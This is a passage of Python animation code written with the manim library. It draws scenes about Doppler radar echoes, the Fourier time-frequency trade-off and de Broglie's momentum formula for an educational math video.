return self.get_graph(self.get_single_pulse_function(x), **kwargs)
def get_single_pulse_function(self, x):
return lambda t : -2*np.sin(10*(t-x))*np.exp(-100*(t-x)**2)
def get_frequency_pulse_graph(self, x, freq = 50, **kwargs):
return self.get_graph(
self.get_frequency_pulse_function(x, freq),
num_graph_points = 700,
**kwargs
)
def get_frequency_pulse_function(self, x, freq):
factor = self.frequency_spread_factor
return lambda t : op.mul(
2*np.cos(2*freq*(t-x)),
min(np.exp(-(freq**2/factor)*(t-x)**2), 0.5)
)
def get_peak_point(self, graph):
anchors = graph.get_anchors()
return anchors[np.argmax([p[1] for p in anchors])]
def get_pulse_and_echo_graphs(self, func, args1, args2):
pulse_graph = func(*args1, color = BLUE)
echo_graph = func(*args2, color = YELLOW)
sum_graph = self.axes.get_graph(
lambda x : sum([
pulse_graph.underlying_function(x),
echo_graph.underlying_function(x),
]),
num_graph_points = echo_graph.get_num_curves(),
color = WHITE
)
sum_graph.background_image_file = "blue_yellow_gradient"
return pulse_graph, echo_graph, sum_graph
class DopplerFormulaInsert(Scene):
def construct(self):
formula = TexMobject(
"f_{\\text{echo}", "=",
"\\left(1 + \\frac{v}{c}\\right)",
"f_{\\text{pulse}}"
)
formula[0].set_color(BLUE)
formula[3].set_color(YELLOW)
randy = Randolph(color = BLUE_C)
formula.scale(1.5)
formula.next_to(randy, UP+LEFT)
formula.shift_onto_screen()
self.add(randy)
self.play(
LaggedStartMap(FadeIn, formula),
randy.change, "pondering", randy.get_bottom(),
)
self.play(Blink(randy))
self.wait(2)
self.play(Blink(randy))
self.wait()
class MentionPRFNuance(TeacherStudentsScene):
def construct(self):
title = TextMobject(
"Speed of light", "$\\gg$", "Speed of a plane"
)
title.to_edge(UP)
self.add(title)
axes = self.axes = Axes(
x_min = 0, x_max = 10,
y_min = 0, y_max = 2,
)
axes.next_to(title, DOWN, buff = MED_LARGE_BUFF)
frequency_label = TextMobject("Frequency")
frequency_label.scale(0.7)
frequency_label.next_to(axes.x_axis.get_right(), UP)
axes.add(frequency_label)
self.add(axes)
pulse_x, shift_x = 4, 6
pulse_graph = self.get_spike_graph(pulse_x)
shift_graph = self.get_spike_graph(shift_x)
shift_graph.set_stroke(YELLOW, 2)
peak_points = VGroup(pulse_graph.peak_point, shift_graph.peak_point)
self.add(pulse_graph)
brace = Brace(peak_points, UP, buff = SMALL_BUFF)
displayed_doppler_shift = TextMobject("How I'm showing the \\\\", "Doppler shift")
actual_doppler_shift = TextMobject("Actual\\\\", "Doppler shift")
doppler_shift_words = VGroup(displayed_doppler_shift, actual_doppler_shift)
doppler_shift_words.set_color(YELLOW)
doppler_shift_words.scale(0.75)
displayed_doppler_shift.next_to(brace, UP, buff = SMALL_BUFF)
actual_doppler_shift.move_to(pulse_graph.peak_point)
actual_doppler_shift.align_to(displayed_doppler_shift)
self.play(
Animation(pulse_graph),
self.teacher.change, "raise_right_hand",
run_time = 1
)
self.play(
ShowCreation(shift_graph),
FadeIn(brace),
Write(displayed_doppler_shift, run_time = 1),
self.get_student_changes(*3*["sassy"]),
)
self.play(
UpdateFromAlphaFunc(
shift_graph,
lambda g, a : Transform(
g, self.get_spike_graph(
interpolate(shift_x, pulse_x+0.01, a),
).match_style(shift_graph)
).update(1),
),
UpdateFromFunc(
brace,
lambda b : b.match_width(
peak_points, stretch = True
).next_to(peak_points, UP, SMALL_BUFF)
),
Transform(
displayed_doppler_shift, actual_doppler_shift,
rate_func = squish_rate_func(smooth, 0.3, 0.6)
),
run_time = 3
)
self.wait(2)
everything = VGroup(
title,
axes, pulse_graph, shift_graph,
brace, displayed_doppler_shift
)
rect = SurroundingRectangle(everything, color = WHITE)
everything.add(rect)
self.teacher_says(
"I'll ignore certain \\\\ nuances for now.",
target_mode = "shruggie",
added_anims = [
everything.scale, 0.4,
everything.to_corner, UP+LEFT,
UpdateFromAlphaFunc(
rect, lambda m, a : m.set_stroke(width = 2*a)
)
],
)
self.change_student_modes(*3*["hesitant"])
self.wait(2)
def get_spike_graph(self, x, color = RED, **kwargs):
graph = self.axes.get_graph(
lambda t : np.exp(-10*(t-x)**2)*np.cos(10*(t-x)),
color = color,
**kwargs
)
graph.peak_point = VectorizedPoint(self.axes.input_to_graph_point(x, graph))
graph.add(graph.peak_point)
return graph
class TimeAndFrequencyGivePositionAndVelocity(IntroduceDopplerRadar):
def construct(self):
x = 7
freq = 25
axes = self.axes = Axes(
x_min = 0, x_max = 10,
y_min = -2, y_max = 2,
)
axes.center()
title = TextMobject("Echo signal")
title.next_to(axes.y_axis, UP)
axes.add(title)
axes.to_edge(UP)
graph = self.get_frequency_pulse_graph(x = x, freq = freq)
graph.background_image_file = "blue_yellow_gradient"
arrow = Arrow(
axes.coords_to_point(0, -1.5),
axes.coords_to_point(x, -1.5),
color = WHITE,
buff = SMALL_BUFF,
)
time = TextMobject("Time")
time.next_to(arrow, DOWN, SMALL_BUFF)
delta_x = 0.7
brace = Brace(
Line(
axes.coords_to_point(x-delta_x, 1),
axes.coords_to_point(x+delta_x, 1)
),
UP
)
frequency = TextMobject("Frequency")
frequency.set_color(YELLOW)
frequency.next_to(brace, UP, SMALL_BUFF)
time_updown_arrow = TexMobject("\\Updownarrow")
time_updown_arrow.next_to(time, DOWN, SMALL_BUFF)
freq_updown_arrow = time_updown_arrow.copy()
freq_updown_arrow.next_to(frequency, UP, SMALL_BUFF)
distance = TextMobject("Distance")
distance.next_to(time_updown_arrow, DOWN, SMALL_BUFF)
velocity = TextMobject("Velocity")
velocity.next_to(freq_updown_arrow, UP, SMALL_BUFF)
VGroup(freq_updown_arrow, velocity).match_style(frequency)
self.add(axes)
self.play(ShowCreation(graph))
self.play(
GrowArrow(arrow),
LaggedStartMap(FadeIn, time, run_time = 1)
)
self.play(
GrowFromCenter(brace),
LaggedStartMap(FadeIn, frequency, run_time = 1)
)
self.wait()
self.play(
GrowFromPoint(time_updown_arrow, time_updown_arrow.get_top()),
ReplacementTransform(
time.copy().fade(1),
distance
)
)
self.play(
GrowFromPoint(freq_updown_arrow, freq_updown_arrow.get_top()),
ReplacementTransform(
frequency.copy().fade(1),
velocity
)
)
self.wait()
class RadarOperatorUncertainty(Scene):
def construct(self):
dish = RadarDish()
dish.scale(3)
dish.move_to(4*RIGHT + 2*DOWN)
dish_words = TextMobject("3b1b industrial \\\\ enterprises")
dish_words.scale(0.25)
dish_words.set_stroke(BLACK, 0.5)
dish_words.set_color(BLACK)
dish_words.move_to(dish, DOWN)
dish_words.shift(SMALL_BUFF*(UP+2*LEFT))
dish.add(dish_words)
randy = Randolph()
randy.next_to(dish, LEFT, aligned_edge = DOWN)
bubble = randy.get_bubble(
width = 7,
height = 4,
)
echo_object = Square()
echo_object.move_to(dish)
echo_object.shift(FRAME_X_RADIUS*RIGHT)
pulse = RadarPulse(dish, echo_object, speed = 6)
plane = Plane().scale(0.5)
plane.move_to(bubble.get_bubble_center()+LEFT)
plane_cloud = ProbabalisticMobjectCloud(
plane,
fill_opacity = 0.3,
n_copies = 10,
)
plane_gdw = plane_cloud.gaussian_distribution_wrapper
vector_cloud = ProbabalisticVectorCloud(
center_func = plane_gdw.get_center,
)
vector_gdw = vector_cloud.gaussian_distribution_wrapper
vector_gdw.scale(0.05)
vector_gdw.move_to(plane_gdw)
vector_gdw.shift(2*RIGHT)
self.add(randy, dish, bubble, plane_cloud, pulse)
self.play(randy.change, "confused")
self.wait(3)
self.add(vector_cloud)
for i in range(3):
for plane_factor, vector_factor, freq in (0.05, 10, 0.01), (20, 0.1, 0.1):
pulse.internal_time = 0
pulse.frequency = freq
self.play(
randy.change, "pondering", plane,
plane_gdw.scale, plane_factor,
vector_gdw.scale, vector_factor,
)
self.wait(2)
class AmbiguityInLongEchos(IntroduceDopplerRadar, PiCreatureScene):
CONFIG = {
"object_x_coords" : [7, 4, 6, 9, 8],
"frequency_spread_factor" : 200,
"n_pulse_singletons" : 16,
"pulse_frequency" : 0.025,
}
def construct(self):
self.setup_axes()
self.setup_objects()
self.send_long_pulse_single_echo()
self.introduce_multiple_objects()
self.use_short_pulse()
self.fourier_transform_of_one_pulse()
self.show_echos_of_moving_objects()
self.overlapping_frequenies_of_various_objects()
self.echos_of_long_pure_signal_in_frequency_space()
self.concentrated_fourier_requires_long_time()
def setup_axes(self):
axes = self.axes = Axes(
x_min = 0, x_max = 10,
y_min = -1.5, y_max = 1.5,
)
time_label = TextMobject("Time")
time_label.next_to(axes.x_axis.get_right(), UP)
axes.add(time_label)
axes.center()
axes.shift(DOWN)
self.add(axes)
dish = self.dish = RadarDish()
dish.move_to(axes, LEFT)
dish.to_edge(UP, buff = LARGE_BUFF)
self.add(dish)
def setup_objects(self):
objects = self.objects = VGroup(
Plane().flip(),
SVGMobject(
file_name = "blimp",
color = BLUE_C,
height = 0.5,
),
SVGMobject(
file_name = "biplane",
color = RED_D,
height = 0.5,
),
SVGMobject(
file_name = "helicopter",
color = LIGHT_GREY,
height = 0.5,
).rotate(-TAU/24),
FalconHeavy(),
)
y_shifts = [0.25, 0, 0.5, 0.25, -0.5]
for x, y, obj in zip(self.object_x_coords, y_shifts, objects):
obj.move_to(self.axes.coords_to_point(x, 0))
obj.align_to(self.dish)
obj.shift(y*UP)
self.object_velocities = [
0.7*LEFT,
0.1*RIGHT,
0.4*LEFT,
0.4*RIGHT,
0.5*UP,
]
def send_long_pulse_single_echo(self):
x = self.object_x_coords[0]
plane = self.objects[0]
self.add(plane)
randy = self.pi_creature
self.remove(randy)
pulse_graph = self.get_frequency_pulse_graph(x)
pulse_graph.background_image_file = "blue_yellow_gradient"
pulse = self.get_pulse(self.dish, plane)
brace = Brace(
Line(
self.axes.coords_to_point(x-1, 1),
self.axes.coords_to_point(x+1, 1),
), UP
)
words = brace.get_text("Spread over time")
self.add(pulse)
self.wait()
squished_rate_func = squish_rate_func(smooth, 0.6, 0.9)
self.play(
ShowCreation(pulse_graph, rate_func=linear),
GrowFromCenter(brace, rate_func = squished_rate_func),
Write(words, rate_func = squished_rate_func),
run_time = 3,
)
self.remove(pulse)
self.play(FadeIn(randy))
self.play(PiCreatureBubbleIntroduction(
randy, "Who cares?",
bubble_class = ThoughtBubble,
bubble_kwargs = {
"direction" : LEFT,
"width" : 2,
"height": 1.5,
},
target_mode = "maybe",
look_at_arg = brace,
))
self.play(Blink(randy))
self.play(LaggedStartMap(
FadeOut, VGroup(
randy.bubble, randy.bubble.content,
brace, words,
)
))
self.curr_graph = pulse_graph
def introduce_multiple_objects(self):
objects = self.objects
x_coords = self.object_x_coords
curr_graph = self.curr_graph
randy = self.pi_creature
graphs = VGroup(*[
self.get_frequency_pulse_graph(x)
for x in x_coords
])
graphs.set_color_by_gradient(BLUE, YELLOW)
sum_graph = self.axes.get_graph(
lambda t : sum([
graph.underlying_function(t)
for graph in graphs
]),
num_graph_points = 1000
)
noise_function = lambda t : np.sum([
0.5*np.sin(f*t)/f
for f in (2, 3, 5, 7, 11, 13)
])
noisy_graph = self.axes.get_graph(
lambda t : sum_graph.underlying_function(t)*(1+noise_function(t)),
num_graph_points = 1000
)
for graph in sum_graph, noisy_graph:
graph.background_image_file = "blue_yellow_gradient"
pulses = self.get_pulses()
self.play(
LaggedStartMap(GrowFromCenter, objects[1:]),
FadeOut(curr_graph),
randy.change, "pondering"
)
self.add(*pulses)
self.wait(0.5)
self.play(
ShowCreation(
sum_graph,
rate_func=linear,
run_time = 3.5,
),
randy.change, "confused"
)
self.remove(*pulses)
self.play(randy.change, "pondering")
self.play(Transform(
sum_graph, noisy_graph,
rate_func = lambda t : wiggle(t, 4),
run_time = 3
))
self.wait(2)
self.curr_graph = sum_graph
def use_short_pulse(self):
curr_graph = self.curr_graph
objects = self.objects
x_coords = self.object_x_coords
randy = self.pi_creature
self.frequency_spread_factor = 10
self.n_pulse_singletons = 4
self.pulse_frequency = 0.015
graphs = VGroup(*[
self.get_frequency_pulse_graph(x)
for x in x_coords
])
sum_graph = self.axes.get_graph(
lambda t : sum([
graph.underlying_function(t)
for graph in graphs
]),
num_graph_points = 1000
)
sum_graph.background_image_file = "blue_yellow_gradient"
pulses = self.get_pulses()
self.play(FadeOut(curr_graph))
self.add(*pulses)
self.wait(0.5)
self.play(
ShowCreation(
sum_graph,
rate_func=linear,
run_time = 3.5,
),
randy.change, "happy"
)
self.wait()
self.curr_graph = sum_graph
self.first_echo_graph = graphs[0]
self.first_echo_graph.set_color(YELLOW)
def fourier_transform_of_one_pulse(self):
frequency_axes = Axes(
x_min = 0, x_max = 20,
x_axis_config = {
"unit_size" : 0.5,
"tick_frequency" : 2,
},
y_min = -.01, y_max = .01,
y_axis_config = {
"unit_size" : 110,
"tick_frequency" : 0.006
}
)
frequency_label = TextMobject("Frequency")
frequency_label.next_to(frequency_axes.x_axis.get_right(), UP)
frequency_axes.add(frequency_label)
first_echo_graph = self.first_echo_graph
self.play(
ApplyMethod(
VGroup(self.axes, first_echo_graph).to_edge, UP,
{"buff" : SMALL_BUFF},
rate_func = squish_rate_func(smooth, 0.5, 1)
),
LaggedStartMap(FadeOut, self.objects),
LaggedStartMap(FadeOut, VGroup(
self.curr_graph, self.dish, self.pi_creature
)),
run_time = 2
)
#
frequency_axes.next_to(self.axes, DOWN, LARGE_BUFF, LEFT)
fourier_graph = get_fourier_graph(
frequency_axes, first_echo_graph.underlying_function,
t_min = 0, t_max = 25,
complex_to_real_func = np.abs,
)
fourier_graph.save_state()
fourier_graph.move_to(first_echo_graph)
h_vect = 4*RIGHT
fourier_graph.shift(h_vect)
fourier_graph.fade(1)
f = 8
v_line = DashedLine(
frequency_axes.coords_to_point(f, 0),
frequency_axes.coords_to_point(f, frequency_axes.y_max),
)
v_lines = VGroup(
v_line.copy().shift(2*LEFT),
v_line.copy().shift(2*RIGHT),
)
rect = Rectangle(stroke_width = 0, fill_color = YELLOW, fill_opacity = 0.25)
rect.replace(v_lines, stretch = True)
rect.save_state()
rect.stretch(0, 0)
self.play(Write(frequency_axes, run_time = 1))
self.play(
ApplyFunction(
lambda m : m.move_to(fourier_graph.saved_state).shift(-h_vect).fade(1),
first_echo_graph.copy(),
remover = True,
),
fourier_graph.restore
)
self.wait()
self.play(ShowCreation(v_line))
self.play(
ReplacementTransform(VGroup(v_line), v_lines),
rect.restore
)
self.wait()
self.play(FadeOut(v_lines), FadeOut(rect))
self.frequency_axes = frequency_axes
self.fourier_graph = fourier_graph
def show_echos_of_moving_objects(self):
objects = self.objects
objects.save_state()
object_velocities = self.object_velocities
movements = self.object_movements = [
always_shift(
obj,
direction = v/get_norm(v),
rate = get_norm(v)
)
for v, obj in zip(object_velocities, objects)
]
pulses = self.get_pulses()
continual_anims = pulses+movements
self.play(
FadeOut(self.axes),
FadeOut(self.first_echo_graph),
LaggedStartMap(FadeIn, objects),
FadeIn(self.dish)
)
self.add(*continual_anims)
self.wait(4)
self.play(*[
UpdateFromAlphaFunc(
obj,
lambda m, a : m.set_fill(opacity = 1-a),
)
for obj in objects
])
self.remove(*continual_anims)
self.wait()
def overlapping_frequenies_of_various_objects(self):
frequency_axes = self.frequency_axes
fourier_graph = self.fourier_graph
shifted_graphs = self.get_shifted_frequency_graphs(fourier_graph)
color = fourier_graph.get_color()
shifted_graphs.set_color_by_gradient(
average_color(color, WHITE),
color,
average_color(color, BLACK),
)
sum_graph = self.get_sum_graph(frequency_axes, shifted_graphs)
sum_graph.match_style(fourier_graph)
shifted_graphs.save_state()
self.play(ReplacementTransform(
VGroup(fourier_graph), shifted_graphs,
lag_ratio = 0.5,
run_time = 2
))
self.wait()
self.play(
shifted_graphs.arrange, DOWN,
shifted_graphs.move_to, fourier_graph, DOWN,
)
self.wait()
self.play(shifted_graphs.restore),
self.play(ReplacementTransform(
shifted_graphs, VGroup(sum_graph),
))
self.wait()
self.curr_fourier_graph = sum_graph
def echos_of_long_pure_signal_in_frequency_space(self):
curr_fourier_graph = self.curr_fourier_graph
f_max = self.frequency_axes.y_max
new_fourier_graph = self.frequency_axes.get_graph(
lambda x : f_max * np.exp(-100*(x-8)**2),
num_graph_points = 1000,
)
new_fourier_graph.set_color(PINK)
self.play(
FadeOut(curr_fourier_graph),
FadeIn(new_fourier_graph),
)
self.fourier_graph = new_fourier_graph
self.overlapping_frequenies_of_various_objects()
def concentrated_fourier_requires_long_time(self):
objects = self.objects
objects.restore()
object_movements = self.object_movements
self.n_pulse_singletons = 32
pulses = self.get_pulses()
randy = self.pi_creature
continual_anims = object_movements+pulses
self.play(FadeIn(randy))
self.add(*continual_anims)
self.play(randy.change, "angry", *[
UpdateFromAlphaFunc(obj, lambda m, a : m.set_fill(opacity = a))
for obj in objects
])
self.play(Blink(randy))
self.wait(2)
self.play(Blink(randy))
self.wait()
self.play(randy.change, "plain", *[
UpdateFromAlphaFunc(obj, lambda m, a : m.set_fill(opacity = 1-a))
for obj in objects
])
self.wait()
###
def get_frequency_pulse_graph(self, x, freq = 25, **kwargs):
graph = IntroduceDopplerRadar.get_frequency_pulse_graph(
self, x, freq, **kwargs
)
return graph
def get_pulse(self, dish, echo_object):
return RadarPulse(
dish, echo_object,
n_pulse_singletons = self.n_pulse_singletons,
frequency = 0.025,
speed = 5.0,
)
def get_pulses(self):
return [
self.get_pulse(
self.dish.copy().shift(0.01*obj.get_center()[0]),
obj
)
for obj in self.objects
]
def create_pi_creature(self):
randy = Randolph()
randy.scale(0.5).flip()
randy.to_edge(RIGHT, buff = 1.7).shift(0.5*UP)
return randy
def get_shifted_frequency_graphs(self, fourier_graph):
frequency_axes = self.frequency_axes
def get_func(v):
return lambda f : fourier_graph.underlying_function(np.clip(
f-5*v[0],
frequency_axes.x_min,
frequency_axes.x_max,
))
def get_graph(func):
return frequency_axes.get_graph(func)
shifted_graphs = VGroup(*list(map(
get_graph, list(map(get_func, self.object_velocities))
)))
shifted_graphs.match_style(fourier_graph)
return shifted_graphs
def get_sum_graph(self, axes, graphs):
def get_func(graph):
return graph.underlying_function
funcs = list(map(get_func, graphs))
return axes.get_graph(
lambda t : sum([func(t) for func in funcs]),
)
class SummarizeFourierTradeoffForDoppler(Scene):
def construct(self):
time_axes = Axes(
x_min = 0, x_max = 12,
y_min = -0.5, y_max = 1,
)
time_axes.center().to_edge(UP, buff = LARGE_BUFF)
frequency_axes = time_axes.copy()
frequency_axes.next_to(time_axes, DOWN, buff = 2)
time_label = TextMobject("Time")
frequency_label = TextMobject("Frequency")
for label, axes in (time_label, time_axes), (frequency_label, frequency_axes):
label.next_to(axes.get_right(), UP, SMALL_BUFF)
axes.add(label)
frequency_label.shift_onto_screen()
title = TextMobject("Fourier Trade-off")
title.next_to(time_axes, DOWN)
self.add(title)
#Position determines log of scale value for exponentials
a_mob = VectorizedPoint()
x_values = [3, 5, 6, 7, 8]
v_values = [5, 5.5, 5.75, 6.5, 7]
def get_top_graphs():
a = np.exp(a_mob.get_center()[0])
graphs = VGroup(*[
time_axes.get_graph(lambda t : np.exp(-5*a*(t-x)**2))
for x in x_values
])
graphs.set_color(WHITE)
graphs.color_using_background_image("blue_yellow_gradient")
return graphs
def get_bottom_graphs():
a = np.exp(a_mob.get_center()[0])
graphs = VGroup(*[
frequency_axes.get_graph(lambda t : np.exp(-(5./a)*(t-v)**2))
for v in v_values
])
graphs.set_color(RED)
return graphs
top_graphs = get_top_graphs()
bottom_graphs = get_bottom_graphs()
update_top_graphs = Mobject.add_updater(
top_graphs,
lambda g : Transform(g, get_top_graphs()).update(1)
)
update_bottom_graphs = Mobject.add_updater(
bottom_graphs,
lambda g : Transform(g, get_bottom_graphs()).update(1)
)
self.add(time_axes, frequency_axes)
self.add(update_top_graphs, update_bottom_graphs)
shift_vect = 2*RIGHT
for s in 1, -2, 1:
self.play(a_mob.shift, s*shift_vect, run_time = 3)
class MentionUncertaintyPrincipleCopy(MentionUncertaintyPrinciple):
pass
class IntroduceDeBroglie(Scene):
CONFIG = {
"default_wave_frequency" : 1,
"wave_colors" : [BLUE_D, YELLOW],
"dispersion_factor" : 1,
"amplitude" : 1,
}
def construct(self):
text_scale_val = 0.8,
#Overlay real tower in video editor
eiffel_tower = Line(3*DOWN, 3*UP, stroke_width = 0)
picture = ImageMobject("de_Broglie")
picture.set_height(4)
picture.to_corner(UP+LEFT)
name = TextMobject("Louis de Broglie")
name.next_to(picture, DOWN)
picture.save_state()
picture.scale(0)
picture.move_to(eiffel_tower.get_top())
broadcasts = [
Broadcast(
eiffel_tower.get_top(),
big_radius = 10,
n_circles = 10,
lag_ratio = 0.9,
run_time = 7,
rate_func = squish_rate_func(smooth, a, a+0.3),
color = WHITE,
)
for a in np.linspace(0, 0.7, 3)
]
self.play(*broadcasts)
self.play(picture.restore)
self.play(Write(name))
self.wait()
#Time line
time_line = NumberLine(
x_min = 1900,
x_max = 1935,
tick_frequency = 1,
numbers_with_elongated_ticks = list(range(1900, 1941, 10)),
color = BLUE_D
)
time_line.stretch_to_fit_width(FRAME_WIDTH - picture.get_width() - 2)
time_line.add_numbers(*time_line.numbers_with_elongated_ticks)
time_line.next_to(picture, RIGHT, MED_LARGE_BUFF, DOWN)
year_to_words = {
1914 : "Wold War I begins",
1915 : "Einstein field equations",
1916 : "Lewis dot formulas",
1917 : "Not a lot of physics...because war",
1918 : "S'more Rutherford badassery",
1919 : "Eddington confirms general relativity predictions",
1920 : "World is generally stoked on general relativity",
1921 : "Einstein gets long overdue Nobel prize",
1922 : "Stern-Gerlach Experiment",
1923 : "Compton scattering observed",
1924 : "de Broglie's thesis"
}
arrow = Vector(DOWN, color = WHITE)
arrow.next_to(time_line.number_to_point(1914), UP)
words = TextMobject(year_to_words[1914])
words.scale(text_scale_val)
date = Integer(1914)
date.next_to(arrow, UP, LARGE_BUFF)
def get_year(alpha = 0):
return int(time_line.point_to_number(arrow.get_end()))
def update_words(words):
text = year_to_words.get(get_year(), "Hi there")
if text not in words.get_tex_string():
words.__init__(text)
words.scale(text_scale_val)
words.move_to(interpolate(
arrow.get_top(), date.get_bottom(), 0.5
))
update_words(words)
self.play(
FadeIn(time_line),
GrowArrow(arrow),
Write(words),
Write(date),
run_time = 1
)
self.wait()
self.play(
arrow.next_to, time_line.number_to_point(1924), UP,
ChangingDecimal(
date, get_year,
position_update_func = lambda m : m.next_to(arrow, UP, LARGE_BUFF)
),
UpdateFromFunc(words, update_words),
run_time = 3,
)
self.wait()
#Transform time_line
line = time_line
self.play(
FadeOut(time_line.numbers),
VGroup(arrow, words, date).shift, MED_LARGE_BUFF*UP,
*[
ApplyFunction(
lambda m : m.rotate(TAU/4).set_stroke(width = 0),
mob,
remover = True
)
for mob in time_line.tick_marks
]
)
#Wave function
particle = VectorizedPoint()
axes = Axes(x_min = -1, x_max = 10)
axes.match_width(line)
axes.shift(line.get_center() - axes.x_axis.get_center())
im_line = line.copy()
im_line.set_color(YELLOW)
wave_update_animation = self.get_wave_update_animation(
axes, particle, line, im_line
)
for x in range(3):
particle.move_to(axes.coords_to_point(-10, 0))
self.play(
ApplyMethod(
particle.move_to, axes.coords_to_point(22, 0),
rate_func=linear
),
wave_update_animation,
run_time = 3
)
self.wait()
###
def get_wave_update_animation(self, axes, particle, re_line = None, im_line = None):
line = Line(
axes.x_axis.get_left(),
axes.x_axis.get_right(),
)
if re_line is None:
re_line = line.copy()
re_line.set_color(self.wave_colors[0])
if im_line is None:
im_line = line.copy()
im_line.set_color(self.wave_colors[1])
lines = VGroup(im_line, re_line)
def update_lines(lines):
waves = self.get_wave_pair(axes, particle)
for line, wave in zip(lines, waves):
wave.match_style(line)
Transform(line, wave).update(1)
return UpdateFromFunc(lines, update_lines)
def get_wave(
self, axes, particle,
complex_to_real_func = lambda z : z.real,
freq = None,
**kwargs):
freq = freq or self.default_wave_frequency
k0 = 1./freq
t0 = axes.x_axis.point_to_number(particle.get_center())
def func(x):
dispersion = fdiv(1., self.dispersion_factor)*(np.sqrt(1./(1+t0**2)))
wave_part = complex_to_real_func(np.exp(
complex(0, TAU*freq*(x-dispersion))
))
bell_part = np.exp(-dispersion*(x-t0)**2)
amplitude = self.amplitude
return amplitude*wave_part*bell_part
graph = axes.get_graph(func)
return graph
def get_wave_pair(self, axes, particle, colors = None, **kwargs):
if colors is None and "color" not in kwargs:
colors = self.wave_colors
return VGroup(*[
self.get_wave(
axes, particle,
C_to_R, color = color,
**kwargs
)
for C_to_R, color in zip(
[lambda z : z.imag, lambda z : z.real],
colors
)
])
class ShowMomentumFormula(IntroduceDeBroglie, TeacherStudentsScene):
CONFIG = {
"default_wave_frequency" : 2,
"dispersion_factor" : 0.25,
"p_color" : BLUE,
"xi_color" : YELLOW,
"amplitude" : 0.5,
}
def construct(self):
self.introduce_formula()
self.react_to_claim()
def introduce_formula(self):
formula = p, eq, h, xi = TexMobject("p", "=", "h", "\\xi")
formula.move_to(ORIGIN)
formula.scale(1.5)
word_shift_val = 1.75
p_words = TextMobject("Momentum")
p_words.next_to(p, UP, LARGE_BUFF).shift(word_shift_val*LEFT)
p_arrow = Arrow(
p_words.get_bottom(), p.get_corner(UP+LEFT),
buff = SMALL_BUFF
)
added_p_words = TextMobject("(Classically $m \\times v$)")
added_p_words.move_to(p_words, DOWN)
VGroup(p, p_words, added_p_words, p_arrow).set_color(self.p_color)
xi_words = TextMobject("Spatial frequency")
added_xi_words = TextMobject("(cycles per unit \\emph{distance})")
xi_words.next_to(xi, UP, LARGE_BUFF).shift(word_shift_val*RIGHT)
xi_words.align_to(p_words)
xi_arrow = Arrow(
xi_words.get_bottom(), xi.get_corner(UP+RIGHT),
buff = SMALL_BUFF
)
added_xi_words.move_to(xi_words, DOWN)
added_xi_words.align_to(added_p_words, DOWN)
VGroup(xi, xi_words, added_xi_words, xi_arrow).set_color(self.xi_color)
axes = Axes(
x_min = 0, x_max = FRAME_WIDTH,
y_min = -1, y_max = 1,
)
axes.center().to_edge(UP, buff = -0.5)
# axes.next_to(formula, RIGHT)
particle = VectorizedPoint()
wave_update_animation = self.get_wave_update_animation(axes, particle)
wave = wave_update_animation.mobject
wave[0].set_stroke(width = 0)
particle.next_to(wave, LEFT, buff = 2)
wave_propagation = AnimationGroup(
ApplyMethod(particle.move_to, axes.coords_to_point(30, 0)),
wave_update_animation,
run_time = 4,
rate_func=linear,
)
stopped_wave_propagation = AnimationGroup(
ApplyMethod(particle.move_to, xi_words),
wave_update_animation,
run_time = 3,
rate_func=linear,
)
n_v_lines = 10
v_lines = VGroup(*[
DashedLine(UP, DOWN)
for x in range(n_v_lines)
])
v_lines.match_color(xi)
v_lines.arrange(
RIGHT,
buff = float(axes.x_axis.unit_size)/self.default_wave_frequency
)
v_lines.move_to(stopped_wave_propagation.sub_anims[0].target_mobject)
v_lines.align_to(wave)
v_lines.shift(0.125*RIGHT)
self.add(formula, wave)
self.play(
self.teacher.change, "raise_right_hand",
GrowArrow(p_arrow),
Succession(
Write, p_words,
ApplyMethod, p_words.next_to, added_p_words, UP,
),
FadeIn(
added_p_words,
rate_func = squish_rate_func(smooth, 0.5, 1),
run_time = 2,
),
wave_propagation
)
self.play(
Write(xi_words),
GrowArrow(xi_arrow),
self.get_student_changes("confused", "erm", "sassy"),
stopped_wave_propagation
)
self.play(
FadeIn(added_xi_words),
xi_words.next_to, added_xi_words, UP,
)
self.play(
LaggedStartMap(ShowCreation, v_lines),
self.get_student_changes(*["pondering"]*3)
)
self.play(LaggedStartMap(FadeOut, v_lines))
self.wait()
self.formula_labels = VGroup(
p_words, p_arrow, added_p_words,
xi_words, xi_arrow, added_xi_words,
)
self.set_variables_as_attrs(wave, wave_propagation, formula)
def react_to_claim(self):
formula_labels = self.formula_labels
full_formula = VGroup(self.formula, formula_labels)
full_formula.save_state()
wave_propagation = self.wave_propagation
student = self.students[2]
self.student_says(
"Hang on...",
bubble_kwargs = {"height" : 2, "width" : 2, "direction" : LEFT},
target_mode = "sassy",
student_index = 2,
added_anims = [self.teacher.change, "plain"]
)
student.bubble.add(student.bubble.content)
self.wait()
kwargs = {
"path_arc" : TAU/4,
"lag_ratio" : 0.5,
"lag_ratio" : 0.7,
"run_time" : 1.5,
}
self.play(
full_formula.scale, 0,
full_formula.move_to, student.eyes.get_bottom()+SMALL_BUFF*DOWN,
Animation(student.bubble),
**kwargs
)
self.play(full_formula.restore, Animation(student.bubble), **kwargs)
wave_propagation.update_config(
rate_func = lambda a : interpolate(0.35, 1, a)
)
self.play(
wave_propagation,
RemovePiCreatureBubble(student, target_mode = "confused"),
)
wave_propagation.update_config(rate_func = lambda t : t)
self.student_says(
"Physics is \\\\ just weird",
bubble_kwargs = {"height" : 2.5, "width" : 3},
target_mode = "shruggie",
student_index = 0,
added_anims = [ApplyMethod(full_formula.shift, UP)]
)
self.wait()
self.play(
wave_propagation,
ApplyMethod(full_formula.shift, DOWN),
FadeOut(self.students[0].bubble),
FadeOut(self.students[0].bubble.content),
self.get_student_changes(*3*["pondering"]),
self.teacher.change, "pondering",
)
self.play(wave_propagation)
class AskPhysicists(PiCreatureScene):
def construct(self):
morty, physy1, physy2, physy3 = self.pi_creatures
formula = TexMobject("p", "=", "h", "\\xi")
formula.set_color_by_tex_to_color_map({
"p" : BLUE,
"\\xi" : YELLOW,
})
formula.scale(1.5)
formula.to_edge(UP)
formula.save_state()
formula.shift(DOWN)
formula.fade(1)
self.play(formula.restore)
self.pi_creature_says(
morty, "So...why?",
target_mode = "maybe"
)
self.wait(2)
self.play(
RemovePiCreatureBubble(morty),
PiCreatureSays(
physy2,
"Take the Schrödinger equation \\\\ with $H = \\frac{p^2}{2m}+V(x)$",
bubble_kwargs = {"fill_opacity" : 0.9},
),
)
self.play(
PiCreatureSays(
physy1,
"Even classically position and \\\\ momentum are conjugate",
target_mode = "surprised",
bubble_kwargs = {"fill_opacity" : 0.9},
),
)
self.play(
PiCreatureSays(
physy3,
